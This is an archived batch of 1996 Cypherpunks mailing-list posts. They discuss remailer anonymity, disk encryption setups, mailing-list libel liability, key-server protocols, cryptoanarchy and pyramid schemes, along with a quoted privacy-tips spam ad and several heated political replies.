4) Send the bottle of tequila to the address obtained in step 3.
5) Sit back and watch your mail volume decrease.

In the event that these instructions fail to get you removed from the
CypherPunks mailing list, follow these steps :

1) Send mail to admin@toad.com

   To: admin@toad.com
   From: you@your.domain
   Subject: Please remove me from CypherPunks...

   Dear Sir:
      I have been attempting to remove myself from the CypherPunks
      Mailing list for the past 2 (two) weeks, without any success.
      Please find it in your heart to make the administrative
      corrections necessary for me to no longer receive a copy of
      mail sent to cypherpunks@toad.com.

      Thank you.

      Your Name Here
   <EOT>

2) Obtain 1 (one) bottle of tequila (Cuervo Gold, 1.5 liter)
3) Send the object obtained in step 2 to the address previously
   obtained from Ted Garrett <teddygee@visi.net>
4) Sit back and watch your mail volume decrease.

- ---
"Obviously, the US Constitution isn't perfect, but
it's a lot better than what we have now." - Unknown
PGP key id - 0xDEACDFD1 - Full key available from
pgp-public-keys@pgp.mit.edu


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: cp850

iQEVAwUBMoX6BM1+l8EKBK5FAQGb4gf/ZWQBk5SaMIqxcnb9mHKqlfWphHoaFwFv
zb8x1BnD7yAozO6gw4nJAL+jW1XlF+Bzk1oSBBLLbJqjceDfAG2iiaDJVYIdv4zr
GGHSAlwZq5e3RvoUPdSgvLarrT0w7R0/HI8Q3PbmwhbUFMoy5ajaIqjO1s5Q7M9G
rYrusBBf9udQS0Ti4ZD9OmHPzGD69+I9jjVSj2clviGqKbhnxKWvRFrq1toZEFLK
iy4Wfv6VC5m2gb9Ilu3GX/mGs6sUXuHMte58OwFDCBzdV3DjpEGCo2s8A9Veg856
6OWVwoW+NTne32JebCiLXrfe754+XZIXD3OmN9OkdxfQGHXJmY450Q==
=ZmgO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Sun, 10 Nov 1996 09:16:16 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Apology to Dale Thorn
In-Reply-To: <328523F4.3BC@gte.net>
Message-ID: <199611101830.MAA28727@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <328523F4.3BC@gte.net>, on 11/09/96 at 04:38 PM,
   Dale Thorn <dthorn@gte.net> said:

>> Dale you are truly a clueless shmuck.

I wish to apologise for the above comment. I had confused Dale with Don Wood of Snake-Oil
fame.

I am confused by Dale's repeated attacks on PGP without offering viable alternatives for a
public-key encryption system.

Sorry, I'll try to rember ot count to 10 before I post replies to the list. :) 

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Sun, 10 Nov 1996 08:05:12 -0800 (PST)
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Pseudo-law on the list and libel (fwd)
In-Reply-To: <199611091721.LAA00907@einstein>
Message-ID: <Pine.SUN.3.95.961109153536.26103C-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I really get tired of this.

On Sat, 9 Nov 1996, Jim Choate wrote:
> 
> Exactly. Because the list takes in submissions from ALL parties and then
> resubmits them to ALL SUBSCRIBED parties it qualifies as a publisher. 

Oversimplified (this is why people *pay* lawyers...).  First, the
defintion of "publisher" for libel purposes (but NOT for 1st Am. purposes)
varies from state to state.  Variations increase when one considers non-US
jurisdictions.

Second, to take NY state as an example, a mailing list is almost certainly
NOT a "publisher" but a mere "distributor" and thus held to a MUCH lower
standard of care regarding responsibility for libel.  The "distributor",
like the book store owner, is not presumed to be on notice of the content
of the material, and must take action only if she is made specifically
aware of the libelous nature of the specific content.

[...]

> > > Pseudo-law on this list is really getting out of hand.

Nothing new, alas.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here. 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Sun, 10 Nov 1996 11:18:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ideal secure personal computer system
Message-ID: <3.0.32.19961110111720.00e2eeec@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


See the CryptoBook link at http://www.eskimo.com/~joelm

While the concepts were originally developed for a laptop, they're easily
applied to a desktop machine running Win95.

Joel

>Here's a question: if one were designing for oneself a secure personal
>computer system, for use in, say, word processing, spreadsheet,
>communications, the usuals - what system would one purchase and how would
>one set it up?
>
>For example, on the Mac I would envision this as the ideal system:
>
>(1) Get a power mac
>(2) Partition the hard drive into two partitions:
>    install the system folder on one and a copy of CryptDisk
>    make this the startup partition and make it READ ONLY with aliases to
>    folders you want to be modiyfable (such as Eudora Folder in the sys
folder)
>    place these folders on the encrypted partition
>(3) Completely fill the other partition with a CryptDisk file so there is no
>    room for other stuff to be written. Adjust the partition size if needed.
>(4) Install a screen saver (such as shareware Eclipse) that will password
lock
>    the screen after a few minutes of inactivity, and set CryptDisk to
dismount
>    the external partition after a few minutes of inactivity (or longer)
>
>This would be a basic setup. If one had more complex ideas, such as setting
>it up so casual onlookers would not notice the system was protected, you
>could do things like have a decoy normal partition with system folder to
>boot from by default, to be bypassed with an external locked system folder
>disk, after which one could dismount the decoy partition and mount the
>encrypted partition.
>
>If locking the startup volume turns out to be too much of a pain, one could
>install trashguard from Highware software and set it to triple overwrite
>deleted files, and otherwise not lock the startup partition.
>
>How would things work on Windows 95? I imagine most of the old DOS-based
>encryption utilities may have compatibility problems with W95. What would a
>similar ideal system be for a PC?
>
>Tom
>
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay Olbon II <clay.olbon@dynetics.com>
Date: Sun, 10 Nov 1996 08:25:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Pyramid schemes and cryptoanarchy
Message-ID: <1.5.4.32.19961110162356.00a10f10@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


It seems that pyramid scheme spamming has increased of late (if that is
possible!).  In my lifetime, I can only remember a single snail-mail
instance of a pyramid scheme - over the net it is an entirely different
story (although the number of instances is probably proportional to the
number of lists I subsribe to).  With fully anonymous digital cash will come
the ability to develop untraceable pyramid schemes.  As a staunch believer
in the free market, I find laws against these schemes distasteful, quite
hypocrytical (i.e. Social Security), and soon to be unenforceable.

Pyramid schemes could be a growth market in a crypto-anarchic world.  It is
yet another market such as gambling, or the lottery, that could be conducted
with anonymity.  And it appears to be much more widespread on the internet
currently, even without anonymity.  And unlike gambling or the lottery, the
payoffs could increase greatly should anonymity be available.  

Now, what is the point of this discussion of pyramid schemes?  It is to
bring to light yet another area that will be untouchable by governments.
And I think that it will help continue the development and proliferation of
some of our pet projects, specifically fully anonymous digital cash and
remailers.  Remailer operators could even fund their operations through
pyramid schemes (directly, or indirectly through digital postage stamps).  I
am not, however, advocating spam. I simply see it as a natural extension of
current practice, that may actually provide tangible benefits in the near
future.  

Clay

*******************************************************
Clay Olbon			clay.olbon@dynetics.com
engineer, programmer, statistitian, etc.
Dynetics, Inc.
**********************************************tanstaafl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 10 Nov 1996 08:26:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Mailing list liability (fwd)
In-Reply-To: <199611100513.XAA01797@einstein>
Message-ID: <Pine.LNX.3.95.961110111103.404A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 9 Nov 1996, Jim Choate wrote:

> It is exactly editorial control because it prevents, a priori, submissions by
> Vulis under that account. He is FORCED to resort to other means. That is
> what the courts will see, it is what the jury will see, and it is what will
> eventualy sink the list, and place its operator under financial burden for
> years.

You really need to get your facts straight.  Vulis is _not_ prevented from
posting under his name to cpunks.  He has in fact made several posts since
he was removed from the list.  My question still stands.  Why is this editorial
control?  None of the cases you cited were anything like this situation.

> In case you people don't get it, the whole point is to REDUCE the influence
> and control of the government (local, state, and federal). NOT to give even
> more fodder to shoot. For a list operator a primary if not the primary
> goal is to avoid any legal involvement at all costs. Throwing people off
> lists with no subscription limitations is not the way to do that. To be a
> succesful list operator your scruples and the way you treat your subscribers
> MUST be beyond any reproach. The bottem line is that the act was not
> professional and impacts the image of mailing lists, Cypherpunks, its operator,
> and its members in a negative light. I have operated BBS'es and mailing
> lists since '76 and find such actions on the part of a fellow service
> operator to be insulting to the profession that I have enjoyed for 20 years.

Call it what ever you want, it's still government regulation to tell someone
how to run a mailing list.  The first amendment says nothing about any of this
"common carrier" nonsense.  This is just the Supreme Court's interpretation.
If you are so concerned about being "censored", why don't you just ask the list
owner to clearly state his position about subscriptions and submissions
before subscribing?  It's not right to expect someone providing a service free
of charge to accept the burden of making sure his position on subscription and
submissions are stated clearly just because you're too lazy to find out
yourself.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMoYCzSzIPc7jvyFpAQFm4Af/dyisLfA1wOZmhhjhdjx6Mey8S8Z1v2GZ
IGf05tQTulp3jqp4b7nN7i7ErHsA19iez/7DxAkMsDkhre7cGURv4+/msZHyf4hU
FQ9qGsEMGbCUbM5SKM1EjzQOhyHCIUkaETu7aFaWZcDYaHAeNGYU4ZxDxRjBOG/V
wCnKxkKpn37uOUbKbRsY95dSYSlJQf0lJFFYr1xNttiE6gDZq+5gOg2gx1QlhFhj
+FoDj73Rwv6A/AiEX33rrwGw8z5tSEuljTyQb0UbPMyIDQ6XdYk3ostppTzp9zLl
Tlh/5RsZaAK7iLuG5dVyohDJJqudOzljtl3+iU7Vnfd9OkrtV8uEug==
=X/0v
-----END PGP SIGNATURE-----
clear





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 10 Nov 1996 11:39:42 -0800 (PST)
To: Mike Ingle <inglem@adnetsol.com>
Subject: Re: Black markets vs. cryptoanarchy
In-Reply-To: <199611100747.XAA00328@cryptical.adnetsol.com>
Message-ID: <199611101939.LAA13170@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Ingle:
>
>Cryptoanarchy will have arrived when you can openly _advertise_ these
>services and still stay in business indefinitely. Most of the things we
>talk about - even Jim Bell's assassination market - already exist, but
>they cannot be advertised. You have to go looking for them, at some
>risk to both buyer and seller. If the seller is visible enough for you
>to find him, he is visible enough to get caught.

actually "cryptoanarchy" has a lot of different definitions, and
as an exercise, during at least on cpunk meeting in SF there was
a roundtable discussion about what it meant to each person. the
definitions did vary widely. the most optimistic view of cryptoanarchy
would say that its early phases are already upon us in the crypto
inside browsers and the govt paranoia and posturing. other more
restrictive definitions would be similar to your own. 

another view would be that "cryptoanarchy" in the sense of people living
in a society where they evade govts have already existed. in my
view cryptoanarchy is a quite Machiavellian concept and I would
suggest that there are strong parallels. TCM,
originator of the term, is a bit mushy himself in his definitions
and refuses to be pinned down on many specifics. however he has
a pretty good paper out on the subject.

>Currently the techniques of anonymity are limited to two: indirection
>for source anonymity and broadcast for recipient anonymity. We are more
>or less where crypto was before the invention of public key. You can
>gain security by spreading risk among multiple parties (key
>distributors for crypto, or remailers for anonymity) but you can't 
>'make your own anonymity' like you can make your own security with 
>public key crypto.
>
>A theoretical discovery is needed particularly in the area of recipient
>anonymity. Good sender anonymity and weak recipient anonymity leads to
>'hit and run' behavior such as spamming email and newsgroups, but not
>to anonymous markets.

an encrypted reply block using remailers is pretty secure technology.
the remailers are not all that reliable however and these reply
blocks are always breaking; they depend on every link in the chain
working perfectly. I've proposed having an anonymous pool in which
remailers post status information when they successfully pass on
messages, such info could be used to make the remailers more reliable,
although possibly at the expense of having to buffer messages.

has anyone set up a remailer that accepts payment right in the message
itself? that would probably solve a lot of the economic problems, and
it seems that the technology, i.e. digicash, has evolved to the point
it would be possible to implement this. (note I am aware of c2's
web page anonymous sending feature, but as I understand it the digicash
payment here is not automated in the sense of being contained in the message).

with the ability to include a payment in the message itself, you could
pay "buffer services" that would be a layer of abstraction on top
of the current unreliable remailer network and have much greater
reliability.

it seems to me the main proponents of "cryptoanarchy" tend to suggest
a government structure is a completely useless construction. perhaps
so but they would end up erecting othre systems to deal with the
void they might not call "govt" but would have most of the features
of one, imho. something "govtlike" is a measure of a civilized society,
imho, hence my distaste in cryptoanarchy with its seeming naivete
on the legitimate and crucial role of govt in a society. the specifics
may vary between implementations, but imho in general something
"govtlike" is crucial to civilized society.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tom bryce <tjb@acpub.duke.edu>
Date: Sun, 10 Nov 1996 08:57:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: ideal secure personal computer system
Message-ID: <l03010605aeab7149a687@[152.3.87.2]>
MIME-Version: 1.0
Content-Type: text/plain


Here's a question: if one were designing for oneself a secure personal
computer system, for use in, say, word processing, spreadsheet,
communications, the usuals - what system would one purchase and how would
one set it up?

For example, on the Mac I would envision this as the ideal system:

(1) Get a power mac
(2) Partition the hard drive into two partitions:
    install the system folder on one and a copy of CryptDisk
    make this the startup partition and make it READ ONLY with aliases to
    folders you want to be modiyfable (such as Eudora Folder in the sys folder)
    place these folders on the encrypted partition
(3) Completely fill the other partition with a CryptDisk file so there is no
    room for other stuff to be written. Adjust the partition size if needed.
(4) Install a screen saver (such as shareware Eclipse) that will password lock
    the screen after a few minutes of inactivity, and set CryptDisk to dismount
    the external partition after a few minutes of inactivity (or longer)

This would be a basic setup. If one had more complex ideas, such as setting
it up so casual onlookers would not notice the system was protected, you
could do things like have a decoy normal partition with system folder to
boot from by default, to be bypassed with an external locked system folder
disk, after which one could dismount the decoy partition and mount the
encrypted partition.

If locking the startup volume turns out to be too much of a pain, one could
install trashguard from Highware software and set it to triple overwrite
deleted files, and otherwise not lock the startup partition.

How would things work on Windows 95? I imagine most of the old DOS-based
encryption utilities may have compatibility problems with W95. What would a
similar ideal system be for a PC?

Tom






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sun, 10 Nov 1996 12:51:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cypherpunks, Inc?
Message-ID: <v02140b00aeabed89ee52@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


Now why don't the cypherpunks put together something like the item below?
In fact, why don't we form some sort of Guild, trademark the term
cypherpunks (I'll volunteer) and offer cracking and security products (like
the one below) or services?  A product security endorsement from
Cypherpunks Inc. could carry a lot of weight :-)

>From: security.admin77@safest.you
>To:
>Date: Sun, 10 Nov 1996 10:43:01 PST
>Subject: Your Email Privacy Has Been Compromised
>
>
>
>
>This Message Contains Important Information About Violations
>of Your On-Line Privacy.
>
>
>
>*Email and Online Security Violations.*
>Please be advised that information contained in email is similar
>to a post card.  It can easily be read in transit and does not go
>directly from your computer, to the computer of the recipient.
>Your message often passes through the hands of countless
>computer systems on its path to where you sent it.  Because of
>this, it can easily be seen by many prying eyes on the way to its
>destination.  If you are mailing personal, business or financial
>data it is unwise to use traditional email.  There are many people
>on the net who profit by snooping in the open "post card" style
>email that most account holders utilize.  Programs are readily
>available to make this task simple.  Additionally, many people
>are purchasing mailing lists which contain your email address.
>If you do not wish to receive unsolicited email, there are a
>number of free and highly effective steps you can take to
>recapture your privacy.
>
>The personal exposure spoken of is not limited to email.  If you
>make use of other internet services such as the World Wide
>Web, your privacy is at even greater risk.  Unless secure, any
>information you enter on a form can be read in transit, just like
>email.  Additionally, most of the information providers you contact
>on the web routinely collect information about you in high detail.
>This information goes right down to where you are located, and
>what kind of computer and operating system you use!
>
>To combat this problem, many countermeasures have been
>developed of which most account holders remain unaware.  The
>on line criminals would like to keep it that way.  Every net citizen
>needs to learn to stop sending "Post Cards" and stop allowing
>distant machines to accumulate large amounts of information
>about who they are and their interests.
>
>There are many simple things you should be doing right now to
>protect your privacy.  Most of the best countermeasures available
>are FREE.  This is because there is still a very strong vein of
>computer experts on the net who believe in an individual's right to
>privacy.  There are excellent, completely free  programs that you
>should be using right now to browse the web in an untraceable
>and private manner, and send email that only the recipient can
>read!
>
>You don't need to be a computer expert to use these tools.  They
>often take little or no additional time and are designed to be very
>simple for the computer illiterate to use.  The computer gurus
>that designed these programs know that it is extremely important
>that average net citizens make use of them.  They have designed
>and continually revised them with that in mind.
>
>My name is Jeff Martin, my associates and I have spent a great
>deal of time researching this subject. It is my goal to provide you
>with access to the best resources available to keep your
>communications private.  My information relates to both email
>and other aspects of the internet such as the World Wide Web.
>This information was put together because I don't feel that others
>are making it available in this form of wide distribution, and it
>needs to be done.  The internet is just like a city in that you need
>some street smarts to keep yourself as safe as possible.  That's
>the kind of information I wish would have been provided to me
>when I began to go on line, and it is what I have tried hard to put
>together to help you out.
>
>In my program you'll learn:
>
>*How to send email that cannot be traced.
>
>*How to send email to your friends and associates that cannot
>be read in transit.
>
>*How to post anonymously to Newsgroups.
>
>*How to browse the web and download files anonymously.
>
>*Why you should (almost) never send financial information over
>the net.
>
>*How to prevent your name from being gathered and sold for
>bulk email use.
>
>*And Much, Much, Much, More ....
>
>My package is a treasure trove of valuable information collected
>to guarantee your privacy!
>
>This is the first time I am making this information available.  In a
>short while, the program will be retailing for $59.95.  However, if
>you respond within the next 7 days of receiving this message you
>will receive the special price of $19.95.  Because of the amazing
>expansion of the internet, I have decided to make this offer so
>that everyone can afford to learn how to protect themselves from
>the net's growing criminal element.  After seven days you may
>still order the program at its retail price of $59.95.
>
>Additionally, if you order within the next 48 hours, I'll include a
>very special report about how you can get a free email address
>and account to use from just about anywhere in the U.S.  I'll
>show you how, but you must order within the next 48 hours!
>
>HOW TO ORDER
>I strive very hard to protect your security.  I do not accept
>unsecure credit card or check information by email, because it is
>too easily intercepted.  While this could increase my orders, I feel
>that your security as a customer is more important. I am a small
>business person and keeping up with phoned and faxed in orders
>has proven to be too difficult for me.  Therefore I now only accept
>orders via postal (snail) mail.  Please be certain to give me your
>email address when ordering.  I prefer to ship orders via email
>so that you can have my information as soon as possible.
>
>To order send a check, money order, or credit card information
>(Visa, MasterCard, Discover) to me at:
>
>Jeff Martin
>POB 72106
>Newport, Kentucky 41072
>
>Any credit card orders must use the attached form below.
>Thank you very much for your time.
>
>Best Wishes,
>
>Jeff Martin
>
>
>This information will always be held in the strictest confidence.
>
> Credit Card:    Visa    Mastercard    Discover
>
> Card #:______________________________________
>
> Expiration Date:__________________
>
> Name on Card:________________________________
>
> Please indicate amount $__________ ($19.95) or (59.95)
>
>
> SIGNATURE:x________________________
>
>DATE:x__________________
>
>
>Copyright 1996, Jeff Martin.  All rights reserved.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 10 Nov 1996 11:20:58 -0800 (PST)
To: clay.olbon@dynetics.com (Clay Olbon II)
Subject: Re: Pyramid schemes and cryptoanarchy
In-Reply-To: <1.5.4.32.19961110162356.00a10f10@ix.netcom.com>
Message-ID: <199611101850.MAA11960@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Clay Olbon II wrote:
> 
> Now, what is the point of this discussion of pyramid schemes?  It is to
> bring to light yet another area that will be untouchable by governments.
> And I think that it will help continue the development and proliferation of
> some of our pet projects, specifically fully anonymous digital cash and
> remailers.  Remailer operators could even fund their operations through
> pyramid schemes (directly, or indirectly through digital postage stamps).  I
> am not, however, advocating spam. I simply see it as a natural extension of
> current practice, that may actually provide tangible benefits in the near
> future.  
> 

I wonder if spammers have already figured out that they can use remailers 
to send spam without being traced.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Sun, 10 Nov 1996 11:18:15 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks)
Subject: Proxies
Message-ID: <199611101254.MAA00304@fountainhead.net>
MIME-Version: 1.0
Content-Type: text



Is there a list of http proxy servers one could go through?
I think its a nice [rather sutle] way of achieving web.anonymity without using 
more apparent anonymizers....

Vipul

-- 

Vipul Ved Prakash                 | - Electronic Security & Crypto 
vipul@pobox.com 	          | - Internet & Intranets 
91 11 2233328                     | - Web Development & PERL 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - (Networked) Multimedia





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kb4vwa@juno.com (Edward R. Figueroa)
Date: Sun, 10 Nov 1996 09:58:30 -0800 (PST)
To: sandfort@crl.com
Subject: Real Time Pads (chat modes)?
Message-ID: <19961110.130149.5359.1.kb4vwa@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Anyone know if there is a software that encrypts DES, or triple DES in
real time for ie, Chat modes?

I think this be a very interesting idea if not already being  used.  I'm
sure the government uses some form of real time pad.

Comments?

Ed




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@amaonline.com>
Date: Sun, 10 Nov 1996 13:03:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Rarity: Crypto question enclosed
Message-ID: <199611102102.NAA17006@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Sun Nov 10 15:03:35 1996
Sorry that this message doesn't include any flames, "outings", 
denigrations, or other stuff......

My simple question is regarding key/certificate distribution:

        Is there any particular reason that such can't be accomplished via 
on-line lists, and made available via a service on a port, using standard 
(textual) commands, like mail and such are now?

        The things that come to mind are a 'client' request for a key, a 
'client' submission of a key, an external host requesting a key exchange, 
and the host itself requesting a key exchange with another system (only 
new/changed keys being swapped).

        The way I see it working is similar to (but not as slow as, or 
requiring the human intervention) of the key servers already existing. 
Granted that the first few such servers might carry a higher load, but I'd 
think that would taper off as the (presumably free) software became 
available, similar to the growth of remailer software (which would seem to 
be a fairly reasonable relationship....).

        Hooks into existing PGP-fluent software shouldn't be difficult with 
a standardized protocol, and I wouldn't think that the servers would be 
that difficult to code and implement on a 'standard' (consistently used, 
that is) port.

        I'm willing to have a try at the first server, if the parameters 
can be defined.

Dave Merriman


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMoV+S8VrTvyYOzAZAQHlMQP/eU3F2JyaQcU6tQ+J5iCdAdPKiBNORJGT
chgNauyaH/dHwj+DzcKZzhmjabsICGZjPbJvH+DIvnbGx3eGF1Y2HUAHvt5ab4ww
gfPJ7xfjwNUJPyrTQtp7lXVdB5BVfSw/I2lHzSg1ssRvTo4iF+gIoAQypOT1Z617
Fo/c1h77KgA=
=pkk/
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil
Date: Sat, 9 Nov 1996 20:28:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: a retort + a comment + a question = [RANT]
Message-ID: <9610108476.AA847661103@smtp-gw.cv62.navy.mil>
MIME-Version: 1.0
Content-Type: text/plain


 ---------------------------------------------------------------------- 
 tim may wrote:
 >"...and that discussions of other topics bother you should be a clear 
 >indication you're probably on the wrong list."
     
        uh, that's _why_ i am on this list...
     
 >"Having a "navy.mil" domain probably is another reason, unless you 
 >are only hear to monitor our discussions of using cryptography to 
 >undermine the state, to liberate military secrets with BlackNet and 
 >the Information Liberation Front, and to punish the millions of 
 >those in the military-industrial complex who have so richly earned 
 >their eventual punishments.
        military secrets, eh?  tell me something mr may, what secrets 
 have you uncovered in your undaunting quest to expose those corrupt 
 little guys in uniform?  mr may - i serve in the US Navy so you don't 
 have to, and as much as i sometimes _don't_ like it, i will always, 
 _always_ love the navy for what she gave me.  one of the reasons you 
 sit at your terminal drinking your coffe and ranting on and on, is 
 because men and women like myself happen to think that what the 
 military does for the US is a good thing.  i skipped collage (don't 
 ask why) after graduating early from HS to enlist in the navy.  
 keeping you free to bitch is why i am here.  never forget that the 
 freedom you enjoy comes with a price, mr may.
        the schools that you send your kids to (forgive me if you're 
 celibate or childless) are run by the govt.  am i saying they do a good 
 job?  not necessarily, but what i _am_ saying is that your kids _still_ 
 go.  i am almost positive, despite attempts to the contrary, that you 
 make use of the US postal system.  the phone lines that you connect 
 that computer to were installed by - guess who? - there are a hundred 
 other things you and i and everyone use that wouldn't be there if it 
 weren't for the USG (or state/county/municipal govt's).  tell me mr 
 may, how much of this are you willing to give up in your quest for what 
 (i am supposing) you mean in your little blurb at the end of your mail 
 - "collapse of governments"?  the writer supposes that mr may would 
 still be against, determined to oppose, and dedicated to the 
 elimination of [pick something, pick anything] if govt's didn't exist.  
        what's the quote?  "i may not agree with what you say, but i 
 defend to the death your right to say it."  something like that.
     
 >Smash the State.  
 aye, aye captain!
 --------------------------------------------------------------------- 
 mark m wrote:
 >In order for anonymous remailers to be completely anonymous, only one 
 >remailer in the chain has to be trustworthy.  If a message is chained 
 >through N remailers and N-1 of those remailers are run by spooks, the 
 >anonymity of the message depends on the remaining remailer.
     
 well, actually, the first remailer has to be the trustworthy one.  you 
 send a msg to the first with your "real" address, and if the spook is 
 there, voila! so...  i understand your point, but still, it has to be 
 the first one.
 ---------------------------------------------------------------------- 
 dale thorn(?) wrote:
 >I'm amused to think that, in a nation armed with 20,000 or so nukes, 
 >the paranoid of paranoid nation-states as it were, some of the 
 >erstwhile intelligent citizens think that the U.S. military are just 
 >sitting around wringing their hands over the "fact" that the citizens 
 >have "unbreakable" crypto.
 >Bear in mind the Scientific American articles on Public Key crypto 
 >back in the 1970's.  The military knew the score back then, and if 
 >you think they just sat back and allowed all this to happen, well, 
 >sorry, I don't believe in Santa Claus or the Easter Bunny.
     
 one question (sarcastic and rhetorical): how long did it take for the 
 USG to actually acknowledge that the NSA.NRO.DIA.etc existed? hmmm.... 
 has a segment of the populace gone stark raving paraniod?
     
 >Second, any truly secret messaging taking place represents a serious 
 >threat to the military, and contrary to some naive popular opinion, 
 >those guys are not going to lay down for this...
     
 what does the military have to do wiht private citizens conversing in 
 secret?  are _you_ one of the naive that think men actually in 
 uniform controll the military?  hello - the SecDef is a civillian.  
 the president is a democrat.  the military does what the white house/ 
 congress tell it (the writer realizes this is a vastly over- 
 simplified response to a vastly broad statement).
     
 ---------------------- SUCRUM22@cv62.navy.mil -----------------------
   a calculated risk based on the possible consequence of an action
  is better than a haphazard one based on poor judgment or ignorance
 --------------------------------------------------------------------- 
 Don't confuse my views with those of the DoD or the United States Navy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Sun, 10 Nov 1996 13:43:50 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Another possible remailer attack?
Message-ID: <Pine.BSF.3.91.961110132320.185B-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


>> You want to know if Dimitri is the person regularly posting these
>> messages. So, you use your powers as ISP to block his access to all
>> remailers. If the public messages suddenly stop then you can be
>> reasonably certain that Dimitri was sending them.
> I'm not following something...just how to your "powers as ISP" affect a
> remailer in, say, Holland, or one for that matter on another ISP? (As a

Packet filtering at the ISP's router. If Dimitri can't connect to a
remailer, he can't send anonymous messages. Sure there are a lot of hacks
that could be done (like have sendmail on another system send it to a
remailer) but such things could be detected and blocked by clever filters.
In fact, the ISP could just claim to be "going down for maintenance" and
completely block Dimitri from the internet for a while. 

> Just as the Nazis could isolate spy transmitters by selectively
> turning off electricity to different neigborhoods, so, too, can various

Isolating spy transmitters by selectively cutting power is exactly
alalogous to what I have suggested. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 10 Nov 1996 11:21:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: a retort + a comment + a question = [RANT]
Message-ID: <1.5.4.32.19961110191947.006a6ae4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort wrote:

A brilliant mini essay, which most succinctly answers Samuel P.
Huntington's long essay in November Foreign Affairs.

And recaps the ancient struggle between "public-governmental" 
in the "public interest" and "private-anti-governmental" in the 
"private interest."

Those who argue that the public needs protection from internal and
external enemies -- "national security" -- gloss over that this ideology
has a long heritage as a big-time, self-interested business, or racketeer
influenced organized crime, to be blunt. Colin Powellism breast-fed 
on Fight the Day's Devil milk, like two thousand generations of 
fundamentalist up-and-comers.

For governmental and military and priestly careerism is no different that
the profit or organizational kinds. Each have religio-philosophical 
underpinnings backed by shrewd legislative pie-slicing-and-distribution
with crucial physical enforcement to fend off those who didn't get a 
slice and are hungrily pissed at the collusive exclusion.

A lot of this smoke is PR machines blowing hard for each of the Big Bands:
Gov, Mil, Com, Org, Edu, Etc. Blurring the distinctions, stealing from one
another, swapping personnel and programs, doling out contracts, 
racing to copy the latest ploy, apology, attack, whine, while securing 
those ancient by-the-rule perks against the ruthless up-and-comers.

Mafia, military, crypto shooters -- taking orders for small kisses of 
blessing/death, climbing the ladder of earthly reward.

